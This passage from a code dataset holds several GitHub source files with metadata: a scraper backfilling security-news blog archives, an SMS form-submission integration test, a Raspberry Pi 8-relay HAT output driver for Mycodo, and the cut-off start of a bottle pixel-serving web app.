35, "usage_type": "call"}]} +{"seq_id": "17671908233", "text": "from src.Controller.AppBG_ScrapeDeamon import AppBG_ScrapeDeamon\nfrom src.Repository.BG_Report_Repository import BG_Report_Repository\nfrom datetime import date, timedelta\n\n\nclass AppBG_ScrapeBackfillsAll(AppBG_ScrapeDeamon):\n def __init__(self):\n super().__init__()\n self.repoReport = BG_Report_Repository()\n\n def load(self):\n pass\n\n def onManageSpecialBackFill_PaloAltoUnit42(self):\n print(\"Backfill Unit42\")\n\n with open('./data/Unit42_BackFill.html', newline='') as file:\n lines = file.readlines()\n text = \"\".join(lines)\n\n self._processHTML(\"https://unit42.paloaltonetworks.com/\", text, \"article\", {}, \"div[2]/h3/a\", \"div[2]/h3/a\", \"div[2]/ul/li[2]/time\")\n\n def onManageSpecialBackFill_Avast(self):\n print(\"Backfill Avast\")\n\n # Special backfil krebsonsecurity.com/page/[2-213]\n for i in range(2, 8):\n print(\"Page \" + str(i) + \"of 8\")\n\n try:\n self._processDataSource(\"https://decoded.avast.io/page/\" + str(i) + \"/\", \"article\", {}, \"div[2]/div[1]/h2/a\", \"div[2]/div[1]/h2/a\", \"div[2]/div[1]/div[2]/span[2]/span\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_KrebOnSecurity(self):\n print(\"Backfill KrebOnSecurity\")\n\n for i in range(2, 213):\n print(\"Page \" + str(i) + \"of 213\")\n\n # https://krebsonsecurity.com/page/2/,article,header/h2/a,header/h2/a,header/div[2]/div/div[1]/span\n try:\n self._processDataSource(\"https://krebsonsecurity.com/page/\" + str(i) + \"/\", \"article\", {}, \"header/h2/a\", \"header/h2/a\", \"header/div[2]/div/div[1]/span\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_darkreading(self):\n print(\"Backfill darkreading\")\n for i in range(2, 377):\n print(\"Page 
\" + str(i) + \"of 377\")\n\n # https://www.darkreading.com/threat-intelligence?page=377,div,class:topic-content-article,div[2]/div/div/div[1]/div[2]/a,div[2]/div/div/div[1]/div[2]/a,div[2]/div/div/div[2]/div[2]/div[2]\n try:\n self._processDataSource(\"https://www.darkreading.com/threat-intelligence?page=\" + str(i), \"div\", {'class': 'topic-content-article'}, \"div/div/div/div[1]/div[2]/a\", \"div/div/div/div[1]/div[2]/a\", \"div/div/div/div[2]/div[2]/div[2]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_threatpost(self):\n print(\"Backfill threatpost\")\n\n with open('./data/Threatpost_Backfill.html', newline='') as file:\n lines = file.readlines()\n text = \"\".join(lines)\n\n self._processHTML(\"https://threatpost.com/\", text, \"article\", {}, \"div/div[2]/h2/a\", \"div/div[2]/h2/a\", \"div/div[2]/div/div[2]/time\")\n\n def onManageSpecialBackFill_schneier(self):\n print(\"Backfill schneier\")\n for i in range(2, 811):\n print(\"Page \" + str(i) + \"of 811\")\n\n try:\n self._processDataSource(\"https://www.schneier.com/page/\" + str(i) + \"/\", \"div\", {'class': 'article'}, \"h2/a\", \"h2/a\", \"p[last()]/a[1]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_securityaffairs(self):\n print(\"Backfill securityaffairs\")\n for i in range(2, 1284):\n print(\"Page \" + str(i) + \"of 1284\")\n\n try:\n self._processDataSource(\"https://securityaffairs.co/wordpress/page/\" + str(i) + \"/\", \"div\", {'class': 'post'}, \"div/div/div[2]/div/h3/a\", \"div/div/div[2]/div/h3/a\", \"div/div/div[4]/a[1]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_cybergeeks(self):\n print(\"Backfill cybergeeks\")\n for i in range(2, 3):\n print(\"Page \" + str(i) + \"of 2\")\n\n try:\n self._processDataSource(\"https://cybergeeks.tech/page/\" + str(i) + \"/\", \"article\", {}, \"div/div/header/h2/a\", \"div/div/header/h2/a\", \"div/div/header/div/span[3]/span[1]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_hackernews(self):\n dataStart = date.today()\n print(\"Backfill cybergeeks\")\n for i in range(2, 4300):\n print(\"Page \" + str(i) + \"of 4300\")\n url = f\"https://thehackernews.com/search?updated-max={dataStart.strftime('%Y-%m-%d')}T00:00:00-00:00&max-results=25\"\n try:\n self._processDataSource(url, \"div\", {'class': 'body-post'}, \"a\", \"a/div/div[2]/h2\", \"a/div/div[2]/div[1]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n\n dataStart = dataStart - timedelta(days=1.0)\n\n def onManageSpecialBackFill_rapid7(self):\n print(\"Backfill rapid7\")\n for i in range(2, 302):\n print(\"Page \" + str(i) + \"of 302\")\n\n try:\n self._processDataSource(\"https://www.rapid7.com/blog/posts/?page=\" + str(i), \"a\", {'class': 'blog-all-posts__wrapper--item'}, \"\", \"div[1]/h3\", \" \")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_alienvault(self):\n print(\"Backfill Alienvault\")\n for i in range(2, 1583):\n print(\"Page \" + str(i) + \"of 1583\")\n\n try:\n self._processDataSource(\"https://cybersecurity.att.com/blogs/P\" + 
str(i), \"div\", {'class': 'blog-card'}, \"div/div[2]/a\", \"div/div[2]/a\", \"div/div[3]\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_welivesecurity(self):\n print(\"Backfill welivesecurity\")\n for i in range(2, 284):\n print(\"Page \" + str(i) + \"of 284\")\n\n try:\n self._processDataSource(\"https://www.welivesecurity.com/page/\" + str(i) + \"/\", \"article\", {}, \"div[2]/h2/a\", \"div[2]/h2/a\", \"div[2]/span/time\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManageSpecialBackFill_nakedsecurity(self):\n print(\"Backfill nakedsecurity\")\n for i in range(2, 1628):\n print(\"Page \" + str(i) + \"of 1628\")\n\n try:\n self._processDataSource(\"https://nakedsecurity.sophos.com/page/\" + str(i) + \"/\", \"article\", {}, \"div[2]/h3/a\", \"div[2]/h3/a\", \"\")\n except Exception as err:\n print(\"Something went wrong with \" + str(err) + \", ignoring this report\")\n continue\n\n def onManage(self):\n self.onManageSpecialBackFill_nakedsecurity()\n self.onManageSpecialBackFill_welivesecurity()\n self.onManageSpecialBackFill_alienvault()\n self.onManageSpecialBackFill_rapid7()\n self.onManageSpecialBackFill_hackernews()\n self.onManageSpecialBackFill_cybergeeks()\n self.onManageSpecialBackFill_securityaffairs()\n self.onManageSpecialBackFill_schneier()\n self.onManageSpecialBackFill_threatpost()\n self.onManageSpecialBackFill_KrebOnSecurity()\n self.onManageSpecialBackFill_Avast()\n self.onManageSpecialBackFill_PaloAltoUnit42()\n self.onManageSpecialBackFill_darkreading()\n", "repo_name": "alainpetit21/Blowgun", "sub_path": "src/Controller/AppBG_ScrapeBackfillsAll.py", "file_name": "AppBG_ScrapeBackfillsAll.py", "file_ext": "py", "file_size_in_byte": 7992, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "src.Controller.AppBG_ScrapeDeamon.AppBG_ScrapeDeamon", "line_number": 6, "usage_type": "name"}, {"api_name": "src.Repository.BG_Report_Repository.BG_Report_Repository", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 104, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 104, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "2329807900", "text": "#vim: ai ts=4 sts=4 et sw=4 encoding=utf-8\n\n\n# This is an integration test.\n# Send sms, parse and save.\nimport random\nfrom string import upper\nfrom time import mktime\nimport unittest\nimport datetime\nfrom couchdb.design import ViewDefinition\nfrom mangrove.bootstrap import initializer\nfrom mangrove.bootstrap.views import view_js\nfrom mangrove.datastore.database import get_db_manager, _delete_db_and_remove_db_manager\nfrom mangrove.datastore.documents import DataRecordDocument\nfrom mangrove.datastore.entity import get_by_short_code, create_entity, create_contact\nfrom mangrove.errors.MangroveException import DataObjectAlreadyExists, EntityTypeDoesNotExistsException,\\\n DataObjectNotFound, FormModelDoesNotExistsException\nfrom mangrove.form_model.field import TextField, IntegerField, SelectField, ShortCodeField\nfrom mangrove.form_model.form_model import FormModel, NAME_FIELD, MOBILE_NUMBER_FIELD, MOBILE_NUMBER_FIELD_CODE,\\\nSHORT_CODE, ENTITY_TYPE_FIELD_CODE, get_form_model_by_code,EntityFormModel\nfrom mangrove.form_model.validation import 
NumericRangeConstraint, TextLengthConstraint\nfrom mangrove.utils.test_utils.database_utils import safe_define_type, uniq, ut_reporter_id\nfrom mangrove.transport.player.player import SMSPlayer\nfrom mangrove.transport.contract.transport_info import TransportInfo\nfrom mangrove.transport.contract.request import Request\nfrom mangrove.datastore.cache_manager import get_cache_manager\n\nclass LocationTree(object):\n def get_location_hierarchy_for_geocode(self, lat, long ):\n return ['madagascar']\n\n def get_centroid(self, location_name, level):\n return 60, -12\n\n def get_location_hierarchy(self, lowest_level_location_name):\n return [u'arantany']\n\nFORM_CODE = \"abc\"\n\n\ndef create_db(name):\n dbm = get_db_manager('http://localhost:5984/', name)\n views = []\n for v in view_js.keys():\n funcs = view_js[v]\n map = (funcs['map'] if 'map' in funcs else None)\n reduce = (funcs['reduce'] if 'reduce' in funcs else None)\n views.append(ViewDefinition(v, v, map, reduce))\n\n ViewDefinition.sync_many(dbm.database, views)\n return dbm\n\n\nclass TestShouldSaveSMSSubmission(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.dbm = create_db(uniq('mangrove-test'))\n initializer.initial_data_setup(cls.dbm)\n cls.entity_type = [\"healthfacility\", \"clinic\"]\n safe_define_type(cls.dbm, cls.entity_type)\n\n cls.entity_short_code = \"cli\" + str(int(random.random()*10000))\n cls.entity = create_entity(cls.dbm, entity_type=cls.entity_type,\n location=[\"India\", \"Pune\"], aggregation_paths=None, short_code=cls.entity_short_code,\n )\n cls.entity.save()\n cls.reporter_id = \"rep\" + str(int(random.random()*10000))\n cls.reporter = create_contact(cls.dbm, location=[\"India\", \"Pune\"],\n aggregation_paths=None, short_code=cls.reporter_id)\n cls.reporter.save()\n\n cls.phone_number = str(int(random.random() * 10000000))\n cls.reporter.add_data(data=[(MOBILE_NUMBER_FIELD, cls.phone_number),\n (NAME_FIELD, \"Test_reporter\")], submission=dict(submission_id=\"2\"))\n\n question1 = ShortCodeField(name=\"entity_question\", code=\"EID\", label=\"What is associated entity\",constraints=[TextLengthConstraint(min=1, max=20)])\n question2 = TextField(name=\"Name\", code=\"NAME\", label=\"Clinic Name\",\n defaultValue=\"some default value\",\n constraints=[TextLengthConstraint(4, 15)], required=False)\n question3 = IntegerField(name=\"Arv stock\", code=\"ARV\", label=\"ARV Stock\",\n constraints=[NumericRangeConstraint(min=15, max=120)], required=False)\n question4 = SelectField(name=\"Color\", code=\"COL\", label=\"Color\",\n options=[(\"RED\", 'a'), (\"YELLOW\", 'a')], required=False)\n\n try:\n cls.form_model = get_form_model_by_code(cls.dbm, \"clinic\")\n except FormModelDoesNotExistsException:\n cls.form_model = EntityFormModel(cls.dbm, entity_type=cls.entity_type, name=\"aids\", label=\"Aids form_model\",\n form_code=\"clinic\", fields=[question1, question2, question3], is_registration_model=True)\n cls.form_model.add_field(question4)\n cls.form_model.save()\n cls.sms_player = SMSPlayer(cls.dbm, LocationTree())\n cls.sms_ordered_message_player = SMSPlayer(cls.dbm, LocationTree())\n\n @classmethod\n def tearDownClass(cls):\n _delete_db_and_remove_db_manager(cls.dbm)\n get_cache_manager().flush_all()\n\n def send_sms(self,text, player = None):\n player = player or self.sms_player\n transport_info = TransportInfo(transport=\"sms\", source=self.phone_number, destination=\"5678\")\n response = player.accept(Request(message=text, transportInfo=transport_info))\n return response\n\n def 
test_should_give_error_for_wrong_integer_value(self):\n text = \"clinic .EID %s .ARV 150 \" % self.entity.short_code\n response = self.send_sms(text)\n self.assertFalse(response.success)\n self.assertEqual(len(response.errors), 1)\n\n def test_should_give_error_for_wrong_text_value(self):\n text = \"clinic .EID %s .NAME ABC\" % self.entity.short_code\n\n response = self.send_sms(text)\n self.assertFalse(response.success)\n self.assertEqual(len(response.errors), 1)\n\n def test_entity_id_with_more_than_20_chars_for_submission(self):\n response = self.send_sms(\"clinic 012345678901234567891\", self.sms_ordered_message_player)\n self.assertEqual(\"Answer 012345678901234567891 for question EID is longer than allowed.\",\n response.errors['EID'])\n", "repo_name": "mangroveorg/mangrove", "sub_path": "mangrove/transport/player/integrationtests/test_sms_submission.py", "file_name": "test_sms_submission.py", "file_ext": "py", "file_size_in_byte": 5711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "61", "api": [{"api_name": "mangrove.datastore.database.get_db_manager", "line_number": 43, "usage_type": "call"}, {"api_name": "mangrove.bootstrap.views.view_js.keys", "line_number": 45, "usage_type": "call"}, {"api_name": "mangrove.bootstrap.views.view_js", "line_number": 45, "usage_type": "name"}, {"api_name": "mangrove.bootstrap.views.view_js", "line_number": 46, "usage_type": "name"}, {"api_name": "couchdb.design.ViewDefinition", "line_number": 49, "usage_type": "call"}, {"api_name": "couchdb.design.ViewDefinition.sync_many", "line_number": 51, "usage_type": "call"}, {"api_name": "couchdb.design.ViewDefinition", "line_number": 51, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 55, "usage_type": "attribute"}, {"api_name": "mangrove.utils.test_utils.database_utils.uniq", "line_number": 59, "usage_type": "call"}, {"api_name": "mangrove.bootstrap.initializer.initial_data_setup", "line_number": 60, "usage_type": "call"}, {"api_name": "mangrove.bootstrap.initializer", "line_number": 60, "usage_type": "name"}, {"api_name": "mangrove.utils.test_utils.database_utils.safe_define_type", "line_number": 62, "usage_type": "call"}, {"api_name": "random.random", "line_number": 64, "usage_type": "call"}, {"api_name": "mangrove.datastore.entity.create_entity", "line_number": 65, "usage_type": "call"}, {"api_name": "random.random", "line_number": 69, "usage_type": "call"}, {"api_name": "mangrove.datastore.entity.create_contact", "line_number": 70, "usage_type": "call"}, {"api_name": "random.random", "line_number": 74, "usage_type": "call"}, {"api_name": "mangrove.form_model.form_model.MOBILE_NUMBER_FIELD", "line_number": 75, "usage_type": "name"}, {"api_name": "mangrove.form_model.form_model.NAME_FIELD", "line_number": 76, "usage_type": "name"}, {"api_name": "mangrove.form_model.field.ShortCodeField", "line_number": 78, "usage_type": "call"}, {"api_name": "mangrove.form_model.validation.TextLengthConstraint", "line_number": 78, "usage_type": "call"}, {"api_name": "mangrove.form_model.field.TextField", "line_number": 79, "usage_type": "call"}, {"api_name": "mangrove.form_model.validation.TextLengthConstraint", "line_number": 81, "usage_type": "call"}, {"api_name": "mangrove.form_model.field.IntegerField", "line_number": 82, "usage_type": "call"}, {"api_name": "mangrove.form_model.validation.NumericRangeConstraint", "line_number": 83, "usage_type": "call"}, {"api_name": "mangrove.form_model.field.SelectField", "line_number": 84, 
"usage_type": "call"}, {"api_name": "mangrove.form_model.form_model.get_form_model_by_code", "line_number": 88, "usage_type": "call"}, {"api_name": "mangrove.errors.MangroveException.FormModelDoesNotExistsException", "line_number": 89, "usage_type": "name"}, {"api_name": "mangrove.form_model.form_model.EntityFormModel", "line_number": 90, "usage_type": "call"}, {"api_name": "mangrove.transport.player.player.SMSPlayer", "line_number": 94, "usage_type": "call"}, {"api_name": "mangrove.transport.player.player.SMSPlayer", "line_number": 95, "usage_type": "call"}, {"api_name": "mangrove.datastore.database._delete_db_and_remove_db_manager", "line_number": 99, "usage_type": "call"}, {"api_name": "mangrove.datastore.cache_manager.get_cache_manager", "line_number": 100, "usage_type": "call"}, {"api_name": "mangrove.transport.contract.transport_info.TransportInfo", "line_number": 104, "usage_type": "call"}, {"api_name": "mangrove.transport.contract.request.Request", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "71766785795", "text": "# coding=utf-8\n#\n# on_off_sequent_8_relay_hat.py - Output for the 8-Relay HAT by Sequent Microsystems\n#\n# Code from https://github.com/SequentMicrosystems/8relind-rpi\n#\nfrom collections import OrderedDict\n\nfrom flask_babel import lazy_gettext\n\nfrom mycodo.config_translations import TRANSLATIONS\nfrom mycodo.databases.models import OutputChannel\nfrom mycodo.outputs.base_output import AbstractOutput\nfrom mycodo.utils.database import db_retrieve_table_daemon\n\n# Measurements\nmeasurements_dict = OrderedDict()\nchannels_dict = OrderedDict()\nfor each_channel in range(8):\n measurements_dict[each_channel] = {\n 'measurement': 'duration_time',\n 'unit': 's'\n }\n channels_dict[each_channel] = {\n 'name': f'Relay {each_channel + 1}',\n 'types': ['on_off'],\n 'measurements': [each_channel]\n }\n\n# Output information\nOUTPUT_INFORMATION = {\n 'output_name_unique': 'SEQUENT_HAT_8_RELAY',\n 'output_name': \"{}: Sequent Microsystems 8-Relay HAT for Raspberry Pi\".format(lazy_gettext('On/Off')),\n 'output_manufacturer': 'Sequent Microsystems',\n 'output_library': 'smbus2',\n 'measurements_dict': measurements_dict,\n 'channels_dict': channels_dict,\n 'output_types': ['on_off'],\n\n 'url_manufacturer': 'https://sequentmicrosystems.com',\n 'url_datasheet': 'https://cdn.shopify.com/s/files/1/0534/4392/0067/files/8-RELAYS-UsersGuide.pdf?v=1642820552',\n 'url_product_purchase': 'https://sequentmicrosystems.com/products/8-relays-stackable-card-for-raspberry-pi',\n 'url_code': 'https://github.com/SequentMicrosystems/8relind-rpi',\n\n 'message': 'Controls the 8 relays of the 8-relay HAT made by Sequent Microsystems. 
8 of these boards can be used simultaneously, allowing 64 relays to be controlled.',\n\n 'options_enabled': [\n 'i2c_location',\n 'button_on',\n 'button_send_duration'\n ],\n 'options_disabled': ['interface'],\n\n 'dependencies_module': [\n ('pip-pypi', 'smbus2', 'smbus2==0.4.1')\n ],\n\n 'interfaces': ['I2C'],\n 'i2c_location': ['0x27'],\n 'i2c_address_editable': False,\n\n 'custom_options': [\n {\n 'id': 'stack_number',\n 'type': 'select',\n 'default_value': 0,\n 'options_select': [\n (0, 'Board 1'),\n (1, 'Board 2'),\n (2, 'Board 3'),\n (3, 'Board 4'),\n (4, 'Board 5'),\n (5, 'Board 6'),\n (6, 'Board 7'),\n (7, 'Board 8'),\n ],\n 'name': 'Board Stack Number',\n 'phrase': 'Select the board stack number when multiple boards are used'\n }\n ],\n\n 'custom_channel_options': [\n {\n 'id': 'name',\n 'type': 'text',\n 'default_value': '',\n 'required': False,\n 'name': TRANSLATIONS['name']['title'],\n 'phrase': TRANSLATIONS['name']['phrase']\n },\n {\n 'id': 'state_startup',\n 'type': 'select',\n 'default_value': 0,\n 'options_select': [\n (0, 'Off'),\n (1, 'On')\n ],\n 'name': lazy_gettext('Startup State'),\n 'phrase': 'Set the state of the GPIO when Mycodo starts'\n },\n {\n 'id': 'state_shutdown',\n 'type': 'select',\n 'default_value': 0,\n 'options_select': [\n (0, 'Off'),\n (1, 'On')\n ],\n 'name': lazy_gettext('Shutdown State'),\n 'phrase': 'Set the state of the GPIO when Mycodo shuts down'\n },\n {\n 'id': 'on_state',\n 'type': 'select',\n 'default_value': 1,\n 'options_select': [\n (1, 'HIGH'),\n (0, 'LOW')\n ],\n 'name': lazy_gettext('On State'),\n 'phrase': 'The state of the GPIO that corresponds to an On state'\n },\n {\n 'id': 'trigger_functions_startup',\n 'type': 'bool',\n 'default_value': False,\n 'name': lazy_gettext('Trigger Functions at Startup'),\n 'phrase': 'Whether to trigger functions when the output switches at startup'\n },\n {\n 'id': 'amps',\n 'type': 'float',\n 'default_value': 0.0,\n 'required': True,\n 'name': \"{} ({})\".format(lazy_gettext('Current'), lazy_gettext('Amps')),\n 'phrase': 'The current draw of the device being controlled'\n }\n ]\n}\n\n\nclass OutputModule(AbstractOutput):\n \"\"\"An output support class that operates an output\"\"\"\n def __init__(self, output, testing=False):\n super().__init__(output, testing=testing, name=__name__)\n\n self.device = None\n\n self.stack_number = None\n\n self.setup_custom_options(\n OUTPUT_INFORMATION['custom_options'], output)\n\n output_channels = db_retrieve_table_daemon(\n OutputChannel).filter(OutputChannel.output_id == output.unique_id).all()\n self.options_channels = self.setup_custom_channel_options_json(\n OUTPUT_INFORMATION['custom_channel_options'], output_channels)\n\n def initialize(self):\n import smbus2\n\n self.setup_output_variables(OUTPUT_INFORMATION)\n\n try:\n self.logger.debug(f\"I2C Bus: {self.output.i2c_bus}\")\n if self.output.i2c_location:\n self.device = RELAYS(smbus2, self.output.i2c_bus, self.logger)\n self.output_setup = True\n except:\n self.logger.exception(\"Could not set up output. 
Check the I2C bus and address are correct.\")\n return\n\n for channel in channels_dict:\n if self.options_channels['state_startup'][channel] == 1:\n self.output_switch(\"on\", output_channel=channel)\n else:\n # Default state: Off\n self.output_switch(\"off\", output_channel=channel)\n\n for channel in channels_dict:\n if self.options_channels['trigger_functions_startup'][channel]:\n try:\n self.check_triggers(self.unique_id, output_channel=channel)\n except Exception as err:\n self.logger.error(f\"Could not check Trigger for channel {channel}: {err}\")\n\n def output_switch(self,\n state,\n output_type=None,\n amount=None,\n duty_cycle=None,\n output_channel=None):\n if output_channel is None:\n msg = \"Output channel needs to be specified\"\n self.logger.error(msg)\n return msg\n\n if not self.is_setup():\n msg = \"Error 101: Device not set up. See https://kizniche.github.io/Mycodo/Error-Codes#error-101 for more info.\"\n self.logger.error(msg)\n return msg\n\n try:\n if state == 'on':\n self.device.set(self.stack_number, output_channel + 1, self.options_channels['on_state'][output_channel])\n self.output_states[output_channel] = bool(self.options_channels['on_state'][output_channel])\n elif state == 'off':\n self.device.set(self.stack_number, output_channel + 1, not self.options_channels['on_state'][output_channel])\n self.output_states[output_channel] = bool(not self.options_channels['on_state'][output_channel])\n\n msg = \"success\"\n except Exception as err:\n msg = f\"CH{output_channel} state change error: {err}\"\n self.logger.error(msg)\n return msg\n\n def is_on(self, output_channel=None):\n if self.is_setup():\n if output_channel is not None and output_channel in self.output_states:\n return self.output_states[output_channel] == self.options_channels['on_state'][output_channel]\n\n def is_setup(self):\n return self.output_setup\n\n def stop_output(self):\n \"\"\"Called when Output is stopped.\"\"\"\n dict_states = {}\n if self.is_setup():\n for channel in channels_dict:\n if self.options_channels['state_shutdown'][channel] == 1:\n self.output_switch(\"on\", output_channel=channel)\n elif self.options_channels['state_shutdown'][channel] == 0:\n self.output_switch(\"off\", output_channel=channel)\n self.running = False\n\n\nclass RELAYS:\n \"\"\"\n A Class to support the Sequent Microsystems 8-Relay HAT for the Raspberry Pi\n I2C addresses: 0x20\n Board stack: 0 - 7\n Relay number range: 0 - 7\n Adapted from the code at https://github.com/SequentMicrosystems/8relind-rpi\n \"\"\"\n DEVICE_ADDRESS = 0x38 # 7 bit address (will be left shifted to add the read write bit)\n ALTERNATE_DEVICE_ADDRESS = 0x20 # 7 bit address (will be left shifted to add the read write bit)\n RELAY8_INPORT_REG_ADD = 0x00\n RELAY8_OUTPORT_REG_ADD = 0x01\n RELAY8_POLINV_REG_ADD = 0x02\n RELAY8_CFG_REG_ADD = 0x03\n relayMaskRemap = [0x01, 0x04, 0x40, 0x10, 0x20, 0x80, 0x08, 0x02]\n\n def __init__(self, smbus, bus, logger):\n self.logger = logger\n self.bus = smbus.SMBus(bus)\n\n def relayToIO(self, relay):\n val = 0\n for i in range(0, 8):\n if (relay & (1 << i)) != 0:\n val = val + self.relayMaskRemap[i]\n return val\n\n def IOToRelay(self, iov):\n val = 0\n for i in range(0, 8):\n if (iov & self.relayMaskRemap[i]) != 0:\n val = val + (1 << i)\n return val\n\n def check(self, bus, add):\n cfg = self.bus.read_byte_data(add, self.RELAY8_CFG_REG_ADD)\n if cfg != 0:\n self.bus.write_byte_data(add, self.RELAY8_CFG_REG_ADD, 0)\n self.bus.write_byte_data(add, self.RELAY8_OUTPORT_REG_ADD, 0)\n return 
self.bus.read_byte_data(add, self.RELAY8_INPORT_REG_ADD)\n\n def set(self, stack, relay, value):\n if stack < 0 or stack > 7:\n raise ValueError('Invalid stack level!')\n stack = 0x07 ^ stack\n if relay < 1:\n raise ValueError('Invalid relay number!')\n if relay > 8:\n raise ValueError('Invalid relay number!')\n\n hwAdd = self.DEVICE_ADDRESS + stack\n try:\n oldVal = self.check(self.bus, hwAdd)\n except Exception as e:\n hwAdd = self.ALTERNATE_DEVICE_ADDRESS + stack\n try:\n oldVal = self.check(self.bus, hwAdd)\n except Exception as e:\n self.bus.close()\n raise ValueError('8-relay card not detected!')\n oldVal = self.IOToRelay(oldVal)\n try:\n if value == 0:\n oldVal = oldVal & (~(1 << (relay - 1)))\n oldVal = self.relayToIO(oldVal)\n self.bus.write_byte_data(hwAdd, self.RELAY8_OUTPORT_REG_ADD, oldVal)\n else:\n oldVal = oldVal | (1 << (relay - 1))\n oldVal = self.relayToIO(oldVal)\n self.bus.write_byte_data(hwAdd, self.RELAY8_OUTPORT_REG_ADD, oldVal)\n except Exception as e:\n self.bus.close()\n raise ValueError('Fail to write relay state value!')\n self.bus.close()\n\n def set_all(self, stack, value):\n if stack < 0 or stack > 7:\n raise ValueError('Invalid stack level!')\n stack = 0x07 ^ stack\n if value > 255:\n raise ValueError('Invalid relay value!')\n if value < 0:\n raise ValueError('Invalid relay value!')\n\n hwAdd = self.DEVICE_ADDRESS + stack\n try:\n oldVal = self.check(self.bus, hwAdd)\n except Exception as e:\n hwAdd = self.ALTERNATE_DEVICE_ADDRESS + stack\n try:\n oldVal = self.check(self.bus, hwAdd)\n except Exception as e:\n self.bus.close()\n raise ValueError('8-relay card not detected!')\n value = self.relayToIO(value)\n try:\n self.bus.write_byte_data(hwAdd, self.RELAY8_OUTPORT_REG_ADD, value)\n except Exception as e:\n self.bus.close()\n raise ValueError('Fail to write relay state value!')\n self.bus.close()\n\n def get(self, stack, relay):\n if stack < 0 or stack > 7:\n raise ValueError('Invalid stack level!')\n stack = 0x07 ^ stack\n if relay < 1:\n raise ValueError('Invalid relay number!')\n if relay > 8:\n raise ValueError('Invalid relay number!')\n\n hwAdd = self.DEVICE_ADDRESS + stack\n try:\n val = self.check(self.bus, hwAdd)\n except Exception as e:\n hwAdd = self.ALTERNATE_DEVICE_ADDRESS + stack\n try:\n val = self.check(self.bus, hwAdd)\n except Exception as e:\n self.bus.close()\n raise ValueError('8-relay card not detected!')\n\n val = self.IOToRelay(val)\n val = val & (1 << (relay - 1))\n self.bus.close()\n if val == 0:\n return 0\n else:\n return 1\n\n def get_all(self, stack):\n if stack < 0 or stack > 7:\n raise ValueError('Invalid stack level!')\n stack = 0x07 ^ stack\n\n hwAdd = self.DEVICE_ADDRESS + stack\n try:\n val = self.check(self.bus, hwAdd)\n except Exception as e:\n hwAdd = self.ALTERNATE_DEVICE_ADDRESS + stack\n try:\n val = self.check(self.bus, hwAdd)\n except Exception as e:\n self.bus.close()\n raise ValueError('8-relay card not detected!')\n\n val = self.IOToRelay(val)\n self.bus.close()\n return val\n", "repo_name": "kizniche/Mycodo", "sub_path": "mycodo/outputs/on_off_sequent_8_relay_hat.py", "file_name": "on_off_sequent_8_relay_hat.py", "file_ext": "py", "file_size_in_byte": 13742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2708, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.OrderedDict", "line_number": 17, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 18, "usage_type": "call"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 33, "usage_type": 
"call"}, {"api_name": "mycodo.config_translations.TRANSLATIONS", "line_number": 88, "usage_type": "name"}, {"api_name": "mycodo.config_translations.TRANSLATIONS", "line_number": 89, "usage_type": "name"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 99, "usage_type": "call"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 110, "usage_type": "call"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 121, "usage_type": "call"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 128, "usage_type": "call"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 136, "usage_type": "call"}, {"api_name": "mycodo.outputs.base_output.AbstractOutput", "line_number": 143, "usage_type": "name"}, {"api_name": "mycodo.utils.database.db_retrieve_table_daemon", "line_number": 155, "usage_type": "call"}, {"api_name": "mycodo.databases.models.OutputChannel", "line_number": 156, "usage_type": "argument"}, {"api_name": "mycodo.databases.models.OutputChannel.output_id", "line_number": 156, "usage_type": "attribute"}]} +{"seq_id": "36969365675", "text": "#!/usr/bin/env python3\n\nfrom datetime import datetime, timedelta\nfrom email.utils import formatdate\nfrom time import mktime\nimport os.path\nfrom urllib3.util import parse_url\n\nfrom bottle import error, redirect, request, response, route, run, template\n\ndir = os.path.dirname(os.path.realpath(__file__))\nfilename = os.path.join(dir, 'dot_clear.png')\nwith open(filename, 'rb') as px:\n buf = px.read()\n\ndef format_headers(h):\n return '\\n'.join(['%s: %s' % (k, v) for (k, v) in h.items()])\n\n@error(404)\n@route('/')\n@route('//')\n@route('/')\ndef pixel(path_domain=\"\"):\n seen = {}\n sites = request.cookies.site\n sites = sites.replace('\"', '')\n for c in sites.split(' '):\n if '.' 
